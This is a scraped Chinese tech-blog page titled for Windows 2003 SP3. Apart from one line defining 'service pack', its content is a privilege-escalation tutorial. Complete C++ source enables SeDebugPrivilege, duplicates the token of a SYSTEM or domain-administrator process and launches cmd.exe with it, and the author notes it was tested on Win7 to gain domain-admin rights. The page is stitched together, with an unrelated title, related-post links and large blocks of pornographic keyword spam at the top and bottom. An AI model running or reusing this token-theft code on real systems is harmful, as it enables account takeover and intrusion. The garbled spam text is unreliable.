人妻少妇精品久久久久久蜜臀av,久久综合激激的五月天,日韩精品无码专区免费播放,欧美精品999

windows 2003 sp3

九賢生活小編 ? ? 電腦百科

前沿拓展:

windows 2003 sp

sp=ServicePack,服務(wù)包的意思,其實(shí)就是補(bǔ)丁的**,一次安裝,之前的 那些系統(tǒng)補(bǔ)丁

SYSTEM->本機(jī)上其他用戶(hù)(包括域用戶(hù))(好家伙,只要本機(jī)有system權(quán)限,域管敢在本機(jī)上創(chuàng)建進(jìn)程就直接能拿到域管權(quán)限) 或者admin獲取debug權(quán)限后去獲取SYSTEM權(quán)限(這里有一個(gè)細(xì)節(jié)點(diǎn),只有owner為administrator的SYSTEM進(jìn)程才能被利用,比如lsass,dllhost)

技術(shù)細(xì)節(jié):通過(guò)尋找高權(quán)限開(kāi)啟的進(jìn)程,再**其令牌用以創(chuàng)建新進(jìn)程,即可達(dá)到提權(quán)目的

#include <iostream>
#include <Windows.h>

//Only administrator can get debug priv
BOOL GetDebugPriv() {
HANDLE Token;
TOKEN_PRIVILEGES tp;
LUID Luid;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &Token)) {
std::cout << "OpenProcessToken ERROR" << GetLastError() << std::endl;
return false;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &Luid)) {
std::cout << "LookupPrivilegeValue ERROR" << GetLastError() << std::endl;
return false;
}
tp.Privileges[0].Luid = Luid;
if (!AdjustTokenPrivileges(Token, FALSE, &tp, sizeof(tp), NULL, NULL) ){
std::cout << "AdjustTokenPrivileges ERROR" << GetLastError() << std::endl;
return false;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
return false;
}
else {
return true;
}
}

int main(int argc, char* argv[]) {
HANDLE t_process;
HANDLE token = NULL;
HANDLE token_bak = NULL;
DWORD process_id;
sscanf_s(argv[1], "%ul", &process_id);
WCHAR command[] = L"C:\Windows\System32\cmd.exe";
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
std::cout << argv[1] << std::endl;
std::cout << "Openning process PID:" << process_id << std::endl;
if (GetDebugPriv()== TRUE) {
std::cout << "Got the debug priv" << std::endl;
}
else {
std::cout << "GetDebugPriv ERROR" << std::endl;
}
system("whoami /priv");
t_process = OpenProcess(PROCESS_ALL_ACCESS, true, process_id);
if (!t_process) {
std::cout << "OpenProcess ERROR" << GetLastError() << std::endl;
}
if (!OpenProcessToken(t_process, TOKEN_ALL_ACCESS, &token)) {
std::cout << "OpenProcessToken ERROR" << GetLastError() << std::endl;
}

if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &token_bak)) {
std::cout << "DuplicateTokenEx ERROR" << GetLastError() << std::endl;
}
if (!CreateProcessWithTokenW(token_bak, LOGON_WITH_PROFILE, NULL, command, 0, NULL, NULL, &startupInfo, &processInformation)) {
std::cout << "CreateProcessWithTokenW ERROR" << GetLastError() << std::endl;
}
return 0;
}
windows 2003 sp3

這是在win7下的測(cè)試結(jié)果 constadministrator 是域控

windows 2003 sp3

拓展知識(shí):

原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請(qǐng)注明出處:http://m.xiesong.cn/5422.html

(0)
上一篇 2023年 2月 4日 am9:03
下一篇 2023年 2月 4日 am9:09

相關(guān)推薦

  • 聯(lián)想thinkpadx1怎么樣,聯(lián)想thinkpadx1yoga

    大家好,今天來(lái)為大家分享聯(lián)想thinkpadx1怎么樣,聯(lián)想thinkpadx1yoga的一些知識(shí)點(diǎn),和聯(lián)想thinkpadx1怎么樣,聯(lián)想thinkpadx1yoga的問(wèn)題解析,大家要是都明白,那么可以忽略,如果不太清楚的話可以看看本篇文章,相信很大概率可以解決您的問(wèn)題,接下來(lái)我們就一起來(lái)看看吧!測(cè)試結(jié)果震撼!ThinkPadX1性能評(píng)測(cè)本次送測(cè)的X1隱士為高配4K版,采用15

    電腦百科 2024年 3月 28日

  • dell400服務(wù)電話

    dell400服務(wù)電話 老鐵們好啊,今天小編給大家分享下我們?cè)谑褂秒娔X過(guò)程中會(huì)遇到的一些問(wèn)題故障該如何處理,熱門(mén)電腦游戲需求配置,電腦使用的一些小技巧 cpu性能天梯圖2017(c…

    2023年 8月 30日

  • W7電腦系統(tǒng)如何清空剪切板

    W7電腦系統(tǒng)如何清空剪切板 談起剪切板大家并不陌生,它是內(nèi)存中的一款區(qū)域,它用來(lái)存儲(chǔ)臨時(shí)數(shù)據(jù)的,不過(guò)有時(shí)候我們會(huì)想要清空它,那么w7電腦系統(tǒng)如何清空剪切板呢?如果你不知道的話,那就…

    2023年 9月 18日

  • 系統(tǒng)還原(系統(tǒng)還原不了怎么辦)

    前沿拓展: 中新網(wǎng)11月16日電(中新財(cái)經(jīng) 邵婉云) 16日,“建行”登上微博熱搜,有網(wǎng)友表示實(shí)時(shí)轉(zhuǎn)賬無(wú)法到賬。建行客服回應(yīng)中新財(cái)經(jīng)表示,11月16日上午9:30后系統(tǒng)故障,無(wú)法辦…

    電腦百科 2023年 2月 19日

  • 惠普康柏筆記本官方(惠普康柏筆記本拆機(jī)視頻)

    惠普康柏筆記本官方(惠普康柏筆記本拆機(jī)視頻) 老鐵們好啊,今天小編給大家分享下我們?cè)谑褂秒娔X過(guò)程中會(huì)遇到的一些問(wèn)題故障該如何處理,熱門(mén)電腦游戲需求配置,電腦使用的一些小技巧 介紹A…

    2023年 8月 15日

  • 高端群體游戲(高端車(chē)的客戶(hù)群體)

    高端群體游戲的基本概念 高端群體游戲是指在游戲中需要付費(fèi),具有高投入門(mén)檻,并且需要有較高游戲玩家素養(yǎng)和組織能力的游戲。打造一個(gè)高端群體游戲需要投入大量資金,精心策劃,并且提供高品質(zhì)…

    電腦百科 2023年 6月 14日

  • 4核cpu16g內(nèi)存(cpu16G是幾核)

    什么是4核CPU 16G內(nèi)存? 在現(xiàn)代計(jì)算機(jī)技術(shù)中,我們常常聽(tīng)到“4核CPU 16G內(nèi)存”這個(gè)詞匯。那么,這個(gè)概念具體指的是什么呢? 第一, “CPU”是指**處理器,可以理解為計(jì)…

    電腦百科 2023年 5月 6日

  • 重啟(重啟之極海聽(tīng)雷)

    前沿拓展: 重啟   在有些時(shí)候我們的電腦重啟后 顯示器 不亮了,這是怎么回事呢?下面就由我來(lái)為你們簡(jiǎn)單的介紹電腦重啟后顯示器不亮的原因及解決 方法 吧!希望能幫到你們!   電腦…

    2023年 2月 14日

  • 聯(lián)想筆記本的型號(hào)在哪看(聯(lián)想筆記本i7所有型號(hào)價(jià)位)

    聯(lián)想筆記本的型號(hào)在哪看(聯(lián)想筆記本i7所有型號(hào)價(jià)位) 大家好,今天給各位分享聯(lián)想筆記本的型號(hào)在哪看(聯(lián)想筆記本i7所有型號(hào)價(jià)位)的一些知識(shí),其中也會(huì)對(duì)聯(lián)想筆記本的型號(hào)在哪看(聯(lián)想筆…

    電腦百科 2023年 9月 28日

  • 如何把文件夾加密(怎么加密文件夾或文檔)

    前沿拓展: 如何把文件夾加密 你試試這幾個(gè),看哪個(gè)你喜歡用:1. 寫(xiě)一段代碼,詳見(jiàn)這篇文章:Wind 1、右擊需要加密的磁盤(pán)選擇【啟用BitLocker(B)】。 2、到了選擇希望…

    2023年 2月 15日
国产主播第一页| 国产精品自拍视频专区| 宝贝你好厉害紧一点h| 少妇下蹲露大唇无遮挡| 亚洲精品少妇午夜无码| 国产黑丝无码久久久| 久久人妻精品| 好爽好舒服免费视频| 老司机精品视频一区二区| 日韩一区二区网站| 就热精品视频| 女人被桶30分钟| 日本高清中文字幕免费一区二区 | 麻豆极品一区| 97人人超碰国产精品最新| 美日韩黄色一级片| 日韩久久久九| 欧州熟妇色xxxxx| 国产精品毛片A∨一区二区三区| 天天操夜夜操狠狠看| 另类哦美色图| 性生活网站| 无码一区二区三区爆白浆| 精品久久蜜桃臀| 亚洲图区五月| 日韩无码不卡高清大片| 亚洲精品国产v片在线观看| 亚洲Av日韩综合| 91午夜国产尤物| 亚洲天堂在在在| 92成人午夜福利一区二区| 欧美永久精品在线| 2828无码高潮片| 免费观看精品久久久| 色悠久久久久久久综合网伊人| 日韩精品日日骚| 欧美精品久久婷婷| 国产强上视频| 日日躁狠狠躁AAAAXXXX| 亚洲成人AV电影在线| 欧美香蕉视频不花钱|